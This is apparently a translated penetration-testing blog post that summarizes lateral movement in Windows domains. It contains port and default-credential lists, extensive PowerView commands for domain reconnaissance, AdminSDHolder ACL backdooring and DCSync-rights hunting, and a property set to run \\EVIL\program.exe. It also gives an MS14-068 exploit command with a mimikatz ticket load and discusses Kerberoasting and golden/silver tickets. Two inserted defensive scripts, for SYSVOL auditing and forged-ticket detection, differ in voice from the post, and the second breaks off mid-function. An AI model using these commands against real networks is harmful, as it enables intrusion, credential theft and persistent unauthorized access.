Summary of Lateral Movement Methods

admin, 2022-07-30 12:56:12





Preface

This article studies and summarizes lateral movement methods.

I. Port-based penetration

1. Common default ports

(1) Web (web vulnerabilities / sensitive directories)

Third-party common component vulnerabilities: struts, thinkphp, jboss, ganglia, zabbix, etc.

  • 80 web
  • 80-89 web
  • 8000-9090 web

(2) Databases (scan for weak passwords)

  • 1433 MSSQL
  • 1521 Oracle
  • 3306 MySQL
  • 5432 PostgreSQL
  • 50000 DB2

(3) Special services (unauthorized access / command execution / vulnerabilities)

  • 443 SSL Heartbleed
  • 445 ms08067 / ms11058 / ms17010, etc.
  • 873 Rsync unauthorized access
  • 5984 CouchDB http://xxx:5984/_utils/
  • 6379 redis unauthorized access
  • 7001,7002 WebLogic default weak credentials, deserialization
  • 9200,9300 elasticsearch; reference: ElasticSearch command execution vulnerability on a Duowan server
  • 11211 memcache unauthorized access
  • 27017,27018 MongoDB unauthorized access
  • 50000 SAP command execution
  • 50070,50030 hadoop default ports, unauthorized access

(4) Common ports (weak-password scanning / port brute force)

  • 21 ftp
  • 22 SSH
  • 23 Telnet
  • 445 SMB weak-password scanning
  • 2601,2604 zebra routing, default password zebra
  • 3389 Remote Desktop

(5) Port-to-service summary

  • 21 ftp
  • 22 SSH
  • 23 Telnet
  • 25 SMTP
  • 53 DNS
  • 69 TFTP
  • 80 web
  • 80-89 web
  • 110 POP3
  • 135 RPC
  • 139 NETBIOS
  • 143 IMAP
  • 161 SNMP
  • 389 LDAP
  • 443 SSL Heartbleed and some web vulnerability tests
  • 445 SMB
  • 512,513,514 Rexec
  • 873 Rsync unauthorized access
  • 1025,111 NFS
  • 1080 socks
  • 1158 ORACLE EMCTL
  • 1433 MSSQL (brute force)
  • 1521 Oracle (iSqlPlus Port: 5560, 7778)
  • 2082/2083 cpanel host management system login (more common abroad)
  • 2222 DA virtual host management system login (more common abroad)
  • 2601,2604 zebra routing, default password zebra
  • 3128 squid proxy default port; if no password is set it can very likely be used to roam the intranet directly
  • 3306 MySQL (brute force)
  • 3312/3311 kangle host management system login
  • 3389 Remote Desktop
  • 3690 svn
  • 4440 rundeck; reference WooYun: roaming Sina's intranet by borrowing one of Sina's services
  • 4848 GlassFish web middleware; weak credentials: admin/adminadmin
  • 5432 PostgreSQL
  • 5900 vnc
  • 5984 CouchDB http://xxx:5984/_utils/
  • 6082 varnish; reference WooYun: Varnish HTTP accelerator CLI unauthorized access easily leads to direct website tampering or use as a proxy into the intranet
  • 6379 redis unauthorized access
  • 7001,7002 WebLogic default weak credentials, deserialization
  • 7778 Kloxo host control panel login
  • 8000-9090 common web ports; some operators like to put admin backends on these non-80 ports
  • 8080 tomcat/WDCd/ host management system, default weak credentials
  • 8080,8089,9090 JBOSS
  • 8081 Symantec AV/Filter for MSE
  • 8083 Vestacp host management system (more common abroad)
  • 8649 ganglia
  • 8888 amh/LuManager host management system default port
  • 9000 fcgi (php execution)
  • 9043 websphere [web middleware]; weak credentials: admin/admin, websphere/websphere, system/manager
  • 9200,9300 elasticsearch; reference WooYun: ElasticSearch command execution vulnerability on a Duowan server
  • 10000 Virtualmin/Webmin server virtual host management system
  • 11211 memcache unauthorized access
  • 27017,27018 MongoDB unauthorized access
  • 28017 mongodb statistics page
  • 50000 SAP command execution
  • 50060 hadoop
  • 50070,50030 hadoop default ports, unauthorized access

2. Port scanning

Target information

  • Port fingerprint information (version information)

  • The service running on the port

  • Common default port numbers

  • Try weak passwords

Tools

  • nmap

  • masscan

  • zmap

  • s scanner

  • Custom scripts

  • NC: nc -v -w 2 -z 192.168.1.1 20-1000

  • hydra

II. Domain penetration

1. Information gathering

(1) PowerView

Get-NetDomain - gets the name of the current user's domain
Get-NetForest - gets the forest associated with the current user's domain
Get-NetForestDomains - gets all domains for the current forest
Get-NetDomainControllers - gets the domain controllers for the current computer's domain
Get-NetCurrentUser - gets the current [domain]username
Get-NetUser - returns all user objects, or the user specified (wildcard specifiable)
Get-NetUserSPNs - gets all user ServicePrincipalNames
Get-NetOUs - gets data for domain organization units
Get-NetGUIDOUs - finds domain OUs linked to a specific GUID
Invoke-NetUserAdd - adds a local or domain user
Get-NetGroups - gets a list of all current groups in the domain
Get-NetGroup - gets data for each user in a specified domain group
Get-NetLocalGroups - gets a list of localgroups on a remote host or hosts
Get-NetLocalGroup - gets the members of a localgroup on a remote host or hosts
Get-NetLocalServices - gets a list of running services/paths on a remote host or hosts
Invoke-NetGroupUserAdd - adds a user to a specified local or domain group
Get-NetComputers - gets a list of all current servers in the domain
Get-NetFileServers - gets a list of file servers used by current domain users
Get-NetShare - gets share information for a specified server
Get-NetLoggedon - gets users actively logged onto a specified server
Get-NetSessions - gets active sessions on a specified server
Get-NetFileSessions - returns combined Get-NetSessions and Get-NetFiles
Get-NetConnections - gets active connections to a specific server resource (share)
Get-NetFiles - gets open files on a server
Get-NetProcesses - gets the remote processes and owners on a remote server

PowerView-2.0-tricks

# NOTE: the most updated version of PowerView (http://www.harmj0y.net/blog/powershell/make-powerview-great-again/)
#   has an updated tricks Gist at https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993

# get all the groups a user is effectively a member of, 'recursing up'
Get-NetGroup -UserName <USER>

# get all the effective members of a group, 'recursing down'
Get-NetGroupMember -GroupName <GROUP> -Recurse

# get the effective set of users who can administer a server
Get-NetLocalGroup -Recurse SERVER.domain.local

# retrieve all the computers a GPP password applies to
Get-NetOU -GUID <GPP_GUID> | %{ Get-NetComputer -ADSPath $_ }

# get all users with passwords changed > 1 year ago
$Date = (Get-Date).AddYears(-1).ToFileTime()
Get-NetUser -Filter "(pwdlastset<=$Date)"
# all enabled users
Get-NetUser -Filter "(!userAccountControl:1.2.840.113556.1.4.803:=2)"
# all disabled users
Get-NetUser -Filter "(userAccountControl:1.2.840.113556.1.4.803:=2)"
# all users that require smart card authentication
Get-NetUser -Filter "(useraccountcontrol:1.2.840.113556.1.4.803:=262144)"
# all users that don't require smart card authentication
Get-NetUser -Filter "(!useraccountcontrol:1.2.840.113556.1.4.803:=262144)"

# enumerate all servers that allow unconstrained delegation, and all users that aren't marked as sensitive/not for delegation
$Computers = Get-NetComputer -Unconstrained
$Users = Get-NetUser -AllowDelegation -AdminCount

# enumerate servers that allow unconstrained kerberos delegation and show all users logged in
Invoke-UserHunter -Unconstrained -ShowAll

# hunt for admin users that allow delegation, logged into servers that allow unconstrained delegation
Invoke-UserHunter -Unconstrained -AdminCount -AllowDelegation

# Get the logged on users for all machines in any *server* OU in a particular domain
Get-NetOU *server* -Domain <domain> | %{Get-NetComputer -ADSPath $_ | %{Get-NetLoggedOn -ComputerName $_}}

# find all users with an SPN set (likely service accounts)
Get-NetUser -SPN

# find all service accounts in "Domain Admins"
Get-NetUser -SPN | ?{$_.memberof -match 'Domain Admins'}

# hunt for all privileged users (adminCount=1)
Invoke-UserHunter -AdminCount

# find users with sidHistory set
Get-NetUser -Filter '(sidHistory=*)'

# enumerate all global catalogs in the forest
Get-NetForestCatalog

# turn a list of computer short names to FQDNs
gc computers.txt | % {Get-NetComputer -ADSpath "GC://GLOBAL.CATALOG" -Filter "(name=$_)"}

# find interesting .vbs/.bat/.ps1 scripts on domain controllers
Invoke-FileFinder -SearchSYSVol

# enumerate the current domain policy, optionally specifying a domain to query for or a DC to reflect queries through
$DomainPolicy = Get-DomainPolicy [-Domain <DOMAIN>] [-DomainController <DC>]
$DomainPolicy.KerberosPolicy   # useful for golden tickets ;)
$DomainPolicy.SystemAccess

# enumerate the current domain controller policy, resolving SIDs to account names, and seeing who has what rights on DCs by default
$DcPolicy = Get-DomainPolicy -Source DC -ResolveSids
$DcPolicy.PrivilegeRights

# enumerate what machines that a particular group has local admin rights to
Find-GPOLocation -GroupName <GROUP>

# enumerate what machines that a given user in the specified domain has RDP access rights to, reflecting queries through a particular DC
Find-GPOLocation -UserName <USER> -Domain <DOMAIN> -DomainController <DC> -LocalGroup RDP

# export a csv of all GPO mappings
Find-GPOLocation | %{$_.computers = $_.computers -join ", "; $_} | Export-CSV -NoTypeInformation gpo_map.csv

# use alternate credentials for searching for files on the domain
$Password = "PASSWORD" | ConvertTo-SecureString -AsPlainText -Force
$Credential = New-Object System.Management.Automation.PSCredential("DOMAIN\user",$Password)
Invoke-FileFinder -Domain DOMAIN -Credential $Credential

# enumerate who has rights to the 'matt' user in 'testlab.local', resolving rights GUIDs to names
Get-ObjectAcl -SamAccountName matt -Domain testlab.local -ResolveGUIDs

# grant user 'will' the rights to change 'matt's password
Add-ObjectAcl -TargetSamAccountName matt -PrincipalSamAccountName will -Rights ResetPassword

# audit the permissions of AdminSDHolder, resolving GUIDs
Get-ObjectACL -ADSPrefix 'CN=AdminSDHolder,CN=System' -ResolveGUIDs

# backdoor the ACLs of all privileged accounts with the 'matt' account through AdminSDHolder abuse
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName matt -Rights All

# retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync)
Get-ObjectACL -DistinguishedName "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? { ($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')}

# find linked DA accounts using name correlation
Get-NetGroupMember -GroupName "Domain Admins" | %{ Get-NetUser $_.membername } | %{ $a=$_.displayname.split(" ")[0..1] -join " "; Get-NetUser -Filter "(displayname=*$a*)" } | Select-Object -Property displayname,samaccountname

# save a PowerView object to disk for later usage
Get-NetUser | Export-Clixml user.out
$Users = Import-Clixml user.out

# Find any machine accounts in privileged groups
Get-NetGroup -AdminCount | Get-NetGroupMember -Recurse | ?{$_.MemberName -like '*$'}

# Enumerate permissions for GPOs where users have some kind of modify rights
Get-NetGPO | Get-ObjectAcl -ResolveGUIDs | Where-Object {($_.ObjectType -eq 'All') -and ($_.ActiveDirectoryRights -match "GenericAll|GenericWrite|WriteProperty|CreateChild" )}

# find all policies applied to a current machine
Get-NetGPO -ComputerName WINDOWS1.testlab.local

# find the user/groups that have read access to the LAPS password property for a specified computer
Get-NetComputer -ComputerName 'LAPSCLIENT.test.local' -FullData | Select-Object -ExpandProperty distinguishedname | ForEach-Object { $_.substring($_.indexof('OU')) } | ForEach-Object { Get-ObjectAcl -ResolveGUIDs -DistinguishedName $_ } | Where-Object { ($_.ObjectType -like 'ms-Mcs-AdmPwd') -and ($_.ActiveDirectoryRights -match 'ReadProperty') } | ForEach-Object { Convert-NameToSid $_.IdentityReference } | Select-Object -ExpandProperty SID | Get-ADObject

# get the ACLs for all OUs where someone is allowed to read the LAPS password attribute
Get-NetOU -FullData | Get-ObjectAcl -ResolveGUIDs | Where-Object { ($_.ObjectType -like 'ms-Mcs-AdmPwd') -and ($_.ActiveDirectoryRights -match 'ReadProperty') } | ForEach-Object { $_ | Add-Member NoteProperty 'IdentitySID' $(Convert-NameToSid $_.IdentityReference).SID; $_ }

# perform a user 'zone transfer' by exporting all AD DNS records from all zones, exporting to a .csv
Get-DNSZone | Get-DNSRecord | Export-CSV -NoTypeInformation dns.csv

# return all universal security groups in a forest with foreign members
Get-NetGroup -Filter '(member=*)(groupType=2147483656)' -ADSPath 'GC://testlab.local' -FullData | Select-Object samaccountname,distinguishedname,member | ForEach-Object {
    $GroupDomain = $_.distinguishedname.subString($_.distinguishedname.IndexOf("DC="))
    $_.Member = $_.Member | ForEach-Object {
        $MemberDomain = $_.subString($_.IndexOf("DC="))
        if($GroupDomain -ne $MemberDomain) { $_ }
    }
    $_
} | Where-Object {$_.Member}

PowerView-3.0-tricks

# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
#   tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
#   https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

# New function naming schema:
# Verbs:
#   Get    : retrieve full raw data sets
#   Find   : 'find' specific data entries in a data set
#   Add    : add a new object to a destination
#   Set    : modify a given object
#   Invoke : lazy catch-all
# Nouns:
#   Verb-Domain* : indicates that LDAP/.NET querying methods are being executed
#   Verb-WMI*    : indicates that WMI is being used under the hood to execute enumeration
#   Verb-Net*    : indicates that Win32 API access is being used under the hood

# get all the groups a user is effectively a member of, 'recursing up' using tokenGroups
Get-DomainGroup -MemberIdentity <User/Group>

# get all the effective members of a group, 'recursing down'
Get-DomainGroupMember -Identity "Domain Admins" -Recurse

# use an alternate credential for any function
$SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-DomainUser -Credential $Cred

# retrieve all the computer dns host names a GPP password applies to
Get-DomainOU -GPLink '<GPP_GUID>' | % {Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname}

# get all users with passwords changed > 1 year ago, returning sam account names and password last set times
$Date = (Get-Date).AddYears(-1).ToFileTime()
Get-DomainUser -LDAPFilter "(pwdlastset<=$Date)" -Properties samaccountname,pwdlastset

# all enabled users, returning distinguishednames
Get-DomainUser -LDAPFilter "(!userAccountControl:1.2.840.113556.1.4.803:=2)" -Properties distinguishedname
Get-DomainUser -UACFilter NOT_ACCOUNTDISABLE -Properties distinguishedname

# all disabled users
Get-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=2)"
Get-DomainUser -UACFilter ACCOUNTDISABLE

# all users that require smart card authentication
Get-DomainUser -LDAPFilter "(useraccountcontrol:1.2.840.113556.1.4.803:=262144)"
Get-DomainUser -UACFilter SMARTCARD_REQUIRED

# all users that *don't* require smart card authentication, only returning sam account names
Get-DomainUser -LDAPFilter "(!useraccountcontrol:1.2.840.113556.1.4.803:=262144)" -Properties samaccountname
Get-DomainUser -UACFilter NOT_SMARTCARD_REQUIRED -Properties samaccountname

# use multiple identity types for any *-Domain* function
'S-1-5-21-890171859-3433809279-3366196753-1114', 'CN=dfm,CN=Users,DC=testlab,DC=local','4c435dd7-dc58-4b14-9a5e-1fdb0e80d201','administrator' | Get-DomainUser -Properties samaccountname,lastlogoff

# find all users with an SPN set (likely service accounts)
Get-DomainUser -SPN

# check for users who don't have kerberos preauthentication set
Get-DomainUser -PreauthNotRequired
Get-DomainUser -UACFilter DONT_REQ_PREAUTH

# find all service accounts in "Domain Admins"
Get-DomainUser -SPN | ?{$_.memberof -match 'Domain Admins'}

# find users with sidHistory set
Get-DomainUser -LDAPFilter '(sidHistory=*)'

# find any users/computers with constrained delegation set
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth

# enumerate all servers that allow unconstrained delegation, and all privileged users that aren't marked as sensitive/not for delegation
$Computers = Get-DomainComputer -Unconstrained
$Users = Get-DomainUser -AllowDelegation -AdminCount

# return the local *groups* of a remote server
Get-NetLocalGroup SERVER.domain.local

# return the local group *members* of a remote server using Win32 API methods (faster but less info)
Get-NetLocalGroupMember -Method API -ComputerName SERVER.domain.local

# Kerberoast any users in a particular OU with SPNs set
Invoke-Kerberoast -SearchBase "LDAP://OU=secret,DC=testlab,DC=local"

# Find-DomainUserLocation == old Invoke-UserHunter
# enumerate servers that allow unconstrained Kerberos delegation and show all users logged in
Find-DomainUserLocation -ComputerUnconstrained -ShowAll

# hunt for admin users that allow delegation, logged into servers that allow unconstrained delegation
Find-DomainUserLocation -ComputerUnconstrained -UserAdminCount -UserAllowDelegation

# find all computers in a given OU
Get-DomainComputer -SearchBase "ldap://OU=..."

# Get the logged on users for all machines in any *server* OU in a particular domain
Get-DomainOU -Identity *server* -Domain <domain> | %{Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname | %{Get-NetLoggedOn -ComputerName $_}}

# enumerate all global catalogs in the forest
Get-ForestGlobalCatalog

# turn a list of computer short names to FQDNs, using a global catalog
gc computers.txt | % {Get-DomainComputer -SearchBase "GC://GLOBAL.CATALOG" -LDAP "(name=$_)" -Properties dnshostname}

# enumerate the current domain controller policy
$DCPolicy = Get-DomainPolicy -Policy DC
$DCPolicy.PrivilegeRights   # user privilege rights on the dc...

# enumerate the current domain policy
$DomainPolicy = Get-DomainPolicy -Policy Domain
$DomainPolicy.KerberosPolicy   # useful for golden tickets ;)
$DomainPolicy.SystemAccess     # password age/etc.

# enumerate what machines that a particular user/group identity has local admin rights to
# Get-DomainGPOUserLocalGroupMapping == old Find-GPOLocation
Get-DomainGPOUserLocalGroupMapping -Identity <User/Group>

# enumerate what machines that a given user in the specified domain has RDP access rights to
Get-DomainGPOUserLocalGroupMapping -Identity <USER> -Domain <DOMAIN> -LocalGroup RDP

# export a csv of all GPO mappings
Get-DomainGPOUserLocalGroupMapping | %{$_.computers = $_.computers -join ", "; $_} | Export-CSV -NoTypeInformation gpo_map.csv

# use alternate credentials for searching for files on the domain
# Find-InterestingDomainShareFile == old Invoke-FileFinder
$Password = "PASSWORD" | ConvertTo-SecureString -AsPlainText -Force
$Credential = New-Object System.Management.Automation.PSCredential("DOMAIN\user",$Password)
Find-InterestingDomainShareFile -Domain DOMAIN -Credential $Credential

# enumerate who has rights to the 'matt' user in 'testlab.local', resolving rights GUIDs to names
Get-DomainObjectAcl -Identity matt -ResolveGUIDs -Domain testlab.local

# grant user 'will' the rights to change 'matt's password
Add-DomainObjectAcl -TargetIdentity matt -PrincipalIdentity will -Rights ResetPassword -Verbose

# audit the permissions of AdminSDHolder, resolving GUIDs
Get-DomainObjectAcl -SearchBase 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -ResolveGUIDs

# backdoor the ACLs of all privileged accounts with the 'matt' account through AdminSDHolder abuse
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All

# retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync)
Get-DomainObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? { ($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')}

# find linked DA accounts using name correlation
Get-DomainGroupMember 'Domain Admins' | %{Get-DomainUser $_.membername -LDAPFilter '(displayname=*)'} | %{$a=$_.displayname.split(' ')[0..1] -join ' '; Get-DomainUser -LDAPFilter "(displayname=*$a*)" -Properties displayname,samaccountname}

# save a PowerView object to disk for later usage
Get-DomainUser | Export-Clixml user.xml
$Users = Import-Clixml user.xml

# Find any machine accounts in privileged groups
Get-DomainGroup -AdminCount | Get-DomainGroupMember -Recurse | ?{$_.MemberName -like '*$'}

# Enumerate permissions for GPOs where users with RIDs of > -1000 have some kind of modification/control rights
Get-DomainObjectAcl -LDAPFilter '(objectCategory=groupPolicyContainer)' | ? { ($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{3,}$') -and ($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner')}

# find all policies applied to a current machine
Get-DomainGPO -ComputerIdentity windows1.testlab.local

# enumerate all groups in a domain that don't have a global scope, returning just group names
Get-DomainGroup -GroupScope NotGlobal -Properties name

# enumerate all foreign users in the global catalog, and query the specified domain localgroups for their memberships
# query the global catalog for foreign security principals with domain-based SIDs, and extract out all distinguishednames
$ForeignUsers = Get-DomainObject -Properties objectsid,distinguishedname -SearchBase "GC://testlab.local" -LDAPFilter '(objectclass=foreignSecurityPrincipal)' | ? {$_.objectsid -match '^S-1-5-.*-[1-9]\d{2,}$'} | Select-Object -ExpandProperty distinguishedname
$Domains = @{}
$ForeignMemberships = ForEach($ForeignUser in $ForeignUsers) {
    # extract the domain the foreign user was added to
    $ForeignUserDomain = $ForeignUser.SubString($ForeignUser.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
    # check if we've already enumerated this domain
    if (-not $Domains[$ForeignUserDomain]) {
        $Domains[$ForeignUserDomain] = $True
        # enumerate all domain local groups from the given domain that have membership set with our foreignSecurityPrincipal set
        $Filter = "(|(member=" + $($ForeignUsers -join ")(member=") + "))"
        Get-DomainGroup -Domain $ForeignUserDomain -Scope DomainLocal -LDAPFilter $Filter -Properties distinguishedname,member
    }
}
$ForeignMemberships | fl

# if running in -sta mode, impersonate another credential a la "runas /netonly"
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Invoke-UserImpersonation -Credential $Cred
# ... action
Invoke-RevertToSelf

# enumerates computers in the current domain with 'outlier' properties, i.e. properties not set from the first result returned by Get-DomainComputer
Get-DomainComputer -FindOne | Find-DomainObjectPropertyOutlier

# set the specified property for the given user identity
Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose

# Set the owner of 'dfm' in the current domain to 'harmj0y'
Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y

# retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync)
Get-ObjectACL "DC=testlab,DC=local" -ResolveGUIDs | ? { ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ObjectAceType -match 'Replication-Get')}

# check if any user passwords are set
$FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl

(2) Get all machines under an OU (BloodHound custom query)

{
    "name": "Find the specified OU computers",
    "queryList": [
        {
            "final": false,
            "title": "Select a OU...",
            "query": "MATCH (n:OU) RETURN distinct n.name ORDER BY n.name DESC"
        },
        {
            "final": true,
            "query": "MATCH (m:OU  {name: $result}) with m MATCH p=(o:OU {objectid: m.objectid})-[r:Contains*1..]->(n:Computer) RETURN p",
            "allowCollapse": true,
            "endNode": "{}"
        }
    ]
}

(3) Automatically mark owned users and machines

  • SyncDog

(4) Get DNS information within the domain

  • adidnsdump

  • Domain penetration: obtaining DNS records

2. Taking the domain controller

(1) SYSVOL

SYSVOL is the shared folder that stores the server copy of the domain's public files; it is replicated among all domain controllers in the domain. The Sysvol folder is created when AD is installed and holds GPOs, scripts and similar data. Anything placed in the Sysvol folder is replicated to every DC in the domain.

References:

  • Finding passwords in SYSVOL and attacking GPP (Group Policy Preferences)

  • Windows Server 2008 R2, part 4: managing the Sysvol folder

  • Obtaining passwords from SYSVOL and Group Policy Preferences in an AD domain

  • Using SYSVOL to recover passwords saved in Group Policy

  • Finding Passwords in SYSVOL & Exploiting Group Policy Preferences
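The references above all revolve around the same defect: a Group Policy Preference item (local user, service, scheduled task, drive map) that stores a password in its XML as a cpassword attribute, readable by every domain member through SYSVOL. The script below is an added example for this page, not code from the original post or from any of the tools it links. It walks a SYSVOL tree and reports every element carrying a cpassword attribute so the item can be removed and the account's password rotated; it decrypts nothing. The GPP file names it looks for are an assumption based on the standard preference item types, and the directory layout, GPO GUID folder names and XML it creates are constructed sample data.

```python
"""Audit a SYSVOL tree for Group Policy Preference items that still carry a
'cpassword' attribute.

Added example for this page; not code from the original post or from any of
the tools it links. It only reports where such attributes exist so the items
can be removed; it decrypts nothing. Everything it creates is constructed
sample data."""
import os
import tempfile
import xml.etree.ElementTree as ET

# GPP item files that can carry a cpassword attribute (assumption based on the
# standard preference item types: local users/groups, services, scheduled
# tasks, data sources, drive maps, printers).
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}

# Attributes that name the account the stored password belongs to, per item type.
ACCOUNT_ATTRS = ("userName", "accountName", "runAs")


def find_gpp_cpassword(sysvol_root):
    """Walk sysvol_root and return (relative_path, element_tag, account) for
    every XML element that carries a cpassword attribute."""
    findings = []
    for dirpath, _dirs, files in os.walk(sysvol_root):
        for name in files:
            if name not in GPP_FILES:
                continue
            path = os.path.join(dirpath, name)
            try:
                tree = ET.parse(path)
            except ET.ParseError:
                continue  # a malformed file should not abort the whole audit
            for elem in tree.iter():
                if "cpassword" not in elem.attrib:
                    continue
                account = next((elem.attrib[a] for a in ACCOUNT_ATTRS
                                if a in elem.attrib), "")
                findings.append((os.path.relpath(path, sysvol_root),
                                 elem.tag, account))
    return findings


# Constructed sample: one Groups.xml with a stored password, one clean Drives.xml.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="backupadm" changed="2014-01-01 00:00:00">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="CONSTRUCTED-SAMPLE-VALUE" changeLogon="0"
                noChange="1" neverExpires="1" acctDisabled="0"
                userName="backupadm"/>
  </User>
</Groups>
"""

SAMPLE_DRIVES_XML = """<?xml version="1.0" encoding="utf-8"?>
<Drives>
  <Drive name="H:" changed="2014-01-01 00:00:00">
    <Properties action="U" path="\\\\fs01\\home" label="Home" letter="H"/>
  </Drive>
</Drives>
"""


def build_sample_sysvol():
    """Create a throwaway SYSVOL-like tree holding the two sample files and
    return its root directory."""
    root = tempfile.mkdtemp(prefix="sysvol_sample_")
    policies = os.path.join(root, "example.local", "Policies")
    groups_dir = os.path.join(policies, "{CONSTRUCTED-GPO-GUID-1}",
                              "Machine", "Preferences", "Groups")
    drives_dir = os.path.join(policies, "{CONSTRUCTED-GPO-GUID-2}",
                              "User", "Preferences", "Drives")
    os.makedirs(groups_dir)
    os.makedirs(drives_dir)
    with open(os.path.join(groups_dir, "Groups.xml"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_GROUPS_XML)
    with open(os.path.join(drives_dir, "Drives.xml"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_DRIVES_XML)
    return root


def audit_sample():
    """Run the audit over the constructed tree; expected: exactly one finding."""
    return find_gpp_cpassword(build_sample_sysvol())


if __name__ == "__main__":
    for rel_path, tag, account in audit_sample():
        print(f"cpassword present: {rel_path} <{tag}> account={account!r}")
```

On a real domain, point find_gpp_cpassword at a mounted \\domain\SYSVOL\domain\Policies path from a domain-joined host; every hit should be treated as a password that is already known to anyone with domain membership, so the item must be deleted and the account rotated, not just the file cleaned.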

(2) MS14-068 Kerberos

python ms14-068.py -u <domain user>@<domain> -p <password> -s <user SID> -d <domain host>

Use mimikatz to load the TGT_darthsidious@pentest.com.ccache produced by the tool into memory, creating a cached ticket:

mimikatz.exe "kerberos::ptc c:\TGT_darthsidious@pentest.com.ccache" exit
net use k: \\pentest.com\c$

References:

  • Reproducing the MS14-068 domain privilege escalation vulnerability

  • The Kerberos toolkit PyKEK

  • An in-depth reading of the MS14-068 vulnerability

  • Security vulnerabilities in Kerberos

(3) SPN scanning

Kerberoast can be an effective way to extract service account credentials from Active Directory as a regular user, without sending any packets to the target system.

An SPN is the unique identifier of a service on a network that uses Kerberos authentication. It consists of a service class, a host name and a port. In a network that uses Kerberos authentication, an SPN must be registered for a server under either a built-in computer account (such as NetworkService or LocalSystem) or a user account. For built-in accounts the SPN is registered automatically, but if a service runs under a domain user account, the SPN must be registered manually for the account to be used.

The main benefits of SPN scanning: it does not need to connect to every IP on the network to check service ports; SPN scanning performs service discovery through LDAP queries to the domain controller, and SPN queries are part of normal Kerberos ticket behaviour, so SPN scanning is relatively hard to detect.

References:

  • Scanless SQL Server discovery

  • SPN scanning

  • PowerShell-AD-Recon

(4) Kerberos golden tickets and silver tickets

Some differences between golden tickets and silver tickets:

  • A Golden Ticket forges the TGT and can obtain access to any Kerberos service; a Silver Ticket forges the TGS and can only access the specified service

  • Different encryption: a Golden Ticket is encrypted with the krbtgt hash; a Silver Ticket is encrypted with the service account's (usually the computer account's) hash

  • Different authentication flow: using a golden ticket requires communicating with the domain controller; using a silver ticket does not

References:

  • Golden tickets and silver tickets explained in one article

  • Kerberos Golden Tickets are Now More Golden

  • Intranet security: cracking domain service accounts in practice

  • How Kerberos authentication works (a very detailed, easy-to-follow explanation)

  • How attackers use Kerberos silver tickets to exploit systems

  • Domain penetration: Pass The Ticket
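The third difference above (a golden ticket still talks to the DC, a silver ticket never does) is what a defender can correlate on. The script below is an added example for this page, not code from the original post or its references. It treats a service-ticket request (Security event 4769) with no preceding TGT issuance (event 4768) for that account as a possible forged TGT, and a Kerberos network logon (event 4624, logon type 3) on a member server with no service-ticket request for that user on any DC as a possible forged service ticket. All event records are constructed sample data; the 10-hour look-back matches the default maximum TGT lifetime and is an assumption about the domain's Kerberos policy.

```python
"""Correlate domain-controller and member-server security events to surface
the two forged-ticket patterns contrasted above.

Added example for this page, not code from the original post. Event ids are
the standard Windows ones (4768 TGT issued, 4769 service ticket requested,
4624 logon); every event record below is constructed sample data."""
from collections import defaultdict
from datetime import datetime, timedelta

# Assumption: default domain Kerberos policy (maximum TGT lifetime 10 hours),
# so a 4769 should normally be preceded by a 4768 within this window.
LOOKBACK = timedelta(hours=10)


def at(hhmm):
    """Timestamp helper for the constructed sample (all events on one day)."""
    return datetime(2022, 7, 30, int(hhmm[:2]), int(hhmm[3:]))


# Constructed DC security log: 4768 = AS-REQ (TGT issued), 4769 = TGS-REQ.
DC_EVENTS = [
    {"id": 4768, "time": at("09:00"), "user": "alice"},
    {"id": 4769, "time": at("09:01"), "user": "alice", "service": "FS01$"},
    {"id": 4769, "time": at("09:30"), "user": "administrator", "service": "DC01$"},
]

# Constructed member-server logs: 4624 network logons authenticated via Kerberos.
MEMBER_EVENTS = [
    {"id": 4624, "time": at("09:01"), "host": "FS01", "user": "alice",
     "logon_type": 3, "package": "Kerberos"},
    {"id": 4624, "time": at("11:00"), "host": "SQL01", "user": "bob",
     "logon_type": 3, "package": "Kerberos"},
]


def suspected_golden_tickets(dc_events, lookback=LOOKBACK):
    """A TGS request with no TGT issuance for the same user inside the
    look-back window: the TGT was never issued by a DC, which is how a forged
    TGT (golden ticket) shows up in DC logs."""
    tgt_times = defaultdict(list)
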